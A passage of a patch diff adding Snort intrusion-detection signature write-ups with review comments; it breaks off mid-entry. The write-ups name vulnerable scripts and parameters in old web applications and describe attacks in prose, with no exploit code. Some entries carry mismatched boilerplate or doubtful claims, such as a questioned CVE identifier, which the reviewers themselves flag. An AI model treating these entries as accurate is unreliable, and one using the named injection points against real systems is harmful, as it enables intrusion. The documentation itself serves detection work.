+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "fileBrowserInner.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
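Review bot: The Attack Scenarios section (an attacker supplying credentials to an authentication mechanism) and the third Detailed Information paragraph come from a generic CGI template and do not match the remote file include described in the Summary; replace them with a scenario that describes a request carrying a remote URL in the APP[path][core] parameter. "ona web server" is a typo, "an exploitation attempt has been attempted" is redundant, and Additional References is empty.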
--- /dev/null
+++ b/doc/signatures/100000855.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000855
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "name" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "name" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
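Review bot: The second Detailed Information paragraph is a comma splice ("...backend for the application, the attacker may also be able to..."); split it into two sentences. Corrective Action only says to patch, but Attack Scenarios correctly identifies the root cause as user input that is not sanitized or checked before it reaches the database, so the corrective action should also mention validating input and using parameterised queries in the application. "ona web server" is a typo, and the only reference is a generic SQL injection article; add the advisory for the class.php "name" parameter.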
--- /dev/null
+++ b/doc/signatures/927.txt
@@ -0,0 +1,62 @@
+SID:
+927
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
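Review bot: This file orders its sections differently from every other file in the patch (SID before Rule, "References:" instead of "Additional References:", separators placed before headings rather than after); if anything parses these documents by section name, rename "References:" and move the Rule/Sid block to the top. Typos: "This even indicates" should be "This event indicates", "can be accesses" should be "can be accessed", and "at type of writing" should be "at time of writing". The References section is empty even though Corrective Action points to Allaire patches; link the Allaire bulletin.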
--- /dev/null
+++ b/doc/signatures/100000387.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000387
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "index.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
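Review bot: Affected Systems ("All systems running CGI applications using Ovidentia") names no Ovidentia version and Additional References is empty, so the reader cannot tell which releases the babInstallPath include in index.php affects; add the advisory and the versions it lists. The Attack Scenarios text about supplying credentials to an authentication mechanism does not describe a remote file include, "ona web server" is a typo, and "an exploitation attempt has been attempted" is redundant.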
--- /dev/null
+++ b/doc/signatures/315.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 315
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
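Review bot: The "--" separator between Detailed Information and Affected Systems is missing, so the two sections run together. The CVE link (CVE-2000-0917) carries a 2000 identifier while the CERT advisory cited beside it is CA-1998-12 and the affected systems are Red Hat 2.0 through 5.1; please verify that this CVE entry actually describes the 1998 mountd logging overflow before shipping it. Typos: "compromize", "wether", and a space before the period in "system privileges ."; "Exploit scripts are available" under Attack Scenarios restates Ease of Attack rather than describing a scenario.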
--- /dev/null
+++ b/doc/signatures/3100.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3100
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
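Review bot: Additional References is empty for a Microsoft License Logging Service overflow that Corrective Action says has a vendor patch; cite the Microsoft security bulletin so the Affected Systems list can be checked (also, "Microsoft Windows Server 2000" is not a product name; the product is Windows 2000 Server). "The unchecked buffer exists when processing the length of messages sent to the logging service" is awkward; say that the service fails to validate the length of the messages it receives.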
--- /dev/null
+++ b/doc/signatures/1398.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in the dtspcd daemon.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of the Common Desktop Environment (CDE) subprocess control service (dtspcd) contain a programming error that allows an attacker to execute arbitrary code.
+
+dtspcd is used to launch remote applications over a network connection. CDE is used on UNIX and Linux systems as a graphical window manager, it was the default X windows interface on Sun systems until the switch to Gnome.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803
+
+CERT:
+http://www.cert.org/advisories/CA-2002-01.html
+http://www.cert.org/advisories/CA-2001-31.html
+http://www.kb.cert.org/vuls/id/172583
+
+--
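Review bot: This file has no Affected Systems section, and the only version information is "Certain versions of the Common Desktop Environment"; the CERT advisories already cited under Additional References list the affected vendors and versions, so add that section from them. "compromize" in Impact is a typo, and "X windows" should be "X Window System".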
--- /dev/null
+++ b/doc/signatures/844.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+844
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
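Review bot: Nothing in this file identifies what SID 844 actually matches: the Summary refers to "a CGI web application" without naming the script or parameter, unlike the remote file include entries in this patch that name both. Without that an analyst cannot triage the alert or judge the "None known" False Positives claim; add the script name and a reference. "ona web server" is a typo, and "attackers choosing" should be "attacker's choosing".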
--- /dev/null
+++ b/doc/signatures/2699.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2699
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure TO_CHAR.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
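Review bot: Impact lists "Denial of Service" but neither Detailed Information nor Attack Scenarios describes how a DoS arises; either explain it (for instance if the advisory says a failed overflow crashes the database process) or drop DoS from Impact. "Oracle Oracle9i" under Affected Systems duplicates the vendor name and gives no release, Additional References is empty, and "Apply the appropriate vendor supplied patch" lacks a period.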
--- /dev/null
+++ b/doc/signatures/336.txt
@@ -0,0 +1,70 @@
+Rule:
+Sid:
+336
+--
+Summary:
+This event is generated when an attempt is made to access roots home
+directory in an ftp session.
+
+--
+Impact:
+Serious. Information disclosure.
+
+--
+Detailed Information:
+An ftp command to change directories to root's home directory has been
+made. If roots home directory is world readable and is within the ftp
+root, the contents may be viewed or downloaded in an ftp session.
+
+Under normal ftp usage (by non-root users), this should never occur.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Scenario A:
+1. Remote attacker has gained root password/access, or is able to access root's home directory.
+2. Attacker will be able to replace important system files at their will, possibly gaining shell access as root.
+
+Scenario B:
+1. System administrator (root) connects to the system via un-encrypted ftp.
+2. An attacker, listening in on the tcp/ip traffic, gains root's password since it was transmitted in 'clear-text'.
+3. The attacker can now log in as root.
+
+Scenario C:
+1. The ~root directory is world readable.
+2. Sensitive files that may exist in this directory can now be accessed by anyone.
+--
+Ease of Attack:
+Scenario A: depends on how the attacker gained root's password
+Scenario B: trivial for someone on the same network or on the route to the comprimiseable system.
+Scenario C: easy.
+--
+False Positives:
+None Known
+The administrator has legitimately logged into this machine from a remote location. 
+Note: this still has the potential for a security breach (see Scenario B).
+--
+False Negatives:
+None Known
+Accessing other system critical directories other than ~root (for example, /etc, where passwd/shadow files are kept) could indicate the same comprimise.
+--
+Corrective Action:
+ - Dissallow ftp login for root, consider using something more secure than ftp for root file transfers.
+ - Make sure root's home directory is NOT world readable.
+ - Root's password may have been discovered, take apropriate action.
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jeremy Stashewsky <jstash@omitthis.uvic.ca>
+
+-- 
+Additional References:
+CVE CVE-1999-0082
+RFC 959: File Transfer Protocol http://www.ietf.org/rfc/rfc959.txt
+
+--
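Review bot: the False Positives and False Negatives sections contradict themselves: each opens with "None Known" and then describes one (an administrator legitimately logging in from a remote location; access to /etc or other critical directories). Drop the "None Known" line in both, or keep only the description. In the same hunk, Affected Systems is empty and should at least say which hosts are in scope (any ftp server that permits root login, going by the Corrective Action), and the text has several spelling errors to fix: "comprimiseable", "comprimise", "Dissallow", "apropriate", "unkown", plus "roots home" should be "root's home" in Summary and Detailed Information.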
--- /dev/null
+++ b/doc/signatures/2573.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2573
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
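Review bot: neither Summary nor Detailed Information says what this rule actually matches; "a potential weakness on a host running a web application on Microsoft IIS" could describe any IIS rule, and without the requested file or URI an analyst cannot separate a true positive from benign traffic. Name the file or path the signature looks for, and add the vendor article, if one exists, under Additional References, which is empty. Minor: the Impact line "Information gathering possible administrator access." needs a separator ("Information gathering. Possible administrator access.").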
--- /dev/null
+++ b/doc/signatures/266.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+266
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
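Review bot: "spurious DNS traffic" in the Summary does not tell the analyst what triggers sid 266, and Impact and Attack Scenarios then talk only about forged responses, so the reader is left guessing whether the rule fires on a malformed query, an unexpected source, or a response pattern; state the matching condition. Since Detailed Information already points at misconfiguration as a likely cause, Corrective Action could also mention restricting which hosts may send recursive queries to the resolver, which removes the most common benign source of odd DNS traffic.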
--- /dev/null
+++ b/doc/signatures/2358.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2358
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Typo3.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Typo3 contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ONLY when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	Typo3 Typo3 3.5 b5
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ONLY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
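Review bot: the claim in Detailed Information that the user running the webserver is "usually root" is wrong for the common case; httpd normally drops privileges and runs PHP as an unprivileged account (www-data, nobody, apache), so code included via the ONLY variable runs as that user unless the server is misconfigured. Rephrase as "with the privileges of the user running the web server" and drop "usually root". Also "Typo3 Typo3 3.5 b5" repeats the product name under Affected Systems, and "GET or POST  request  to" has doubled spaces.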
--- /dev/null
+++ b/doc/signatures/1112.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1112
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
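Review bot: Affected Systems is empty, and Detailed Information says the rule covers web servers, web applications and ftp servers while Attack Scenarios only talks about browsing outside the ftp root; either scope the description to ftp, if sid 1112 is an ftp rule, or make the scenario match the general description, and fill in Affected Systems either way. "target web, web applications and ftp servers" should read "target web servers, web applications and ftp servers".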
--- /dev/null
+++ b/doc/signatures/1774.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1774
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
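Review bot: the Summary names no application, so "a known vulnerability in a PHP web application running on a server" gives an analyst nothing to verify against; the rule matches a specific script or URI and the document should name it, with a reference under Additional References, which is empty. Typos: "running ona web server" should be "running on a web server", and "attackers choosing" should be "attacker's choosing" (twice).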
--- /dev/null
+++ b/doc/signatures/100000549.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000549
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Custom Datin Biz" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "u" parameter in the "user_view.php" script 
+used by the "Custom Datin Biz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Custom Datin Biz
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
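Review bot: the Impact section does not match the vulnerability described. A cross site scripting flaw in the "u" parameter of "user_view.php" runs script in a victim's browser; it does not by itself give "system integrity compromise", "administrative access to the server" or "execution of arbitrary code" on the host, and the paragraph about executing system binaries in Detailed Information is likewise remote-file-include boilerplate. Restate the impact as theft of session cookies or credentials and actions performed in the victim's browser session, which is what Attack Scenarios already describes, and add to Corrective Action that the application should HTML-encode the "u" value before echoing it into the page.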
--- /dev/null
+++ b/doc/signatures/635.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+635
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
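Review bot: Summary and Detailed Information never say what kind of scan sid 635 detects; the Attack Scenarios text about ports 20 and 21 suggests an FTP-related probe, but the document should state the actual trigger, because the "security audit" false positive listed below can only be judged by knowing what traffic fired the rule and whether the source is an authorised scanner.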
--- /dev/null
+++ b/doc/signatures/1990.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1990
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
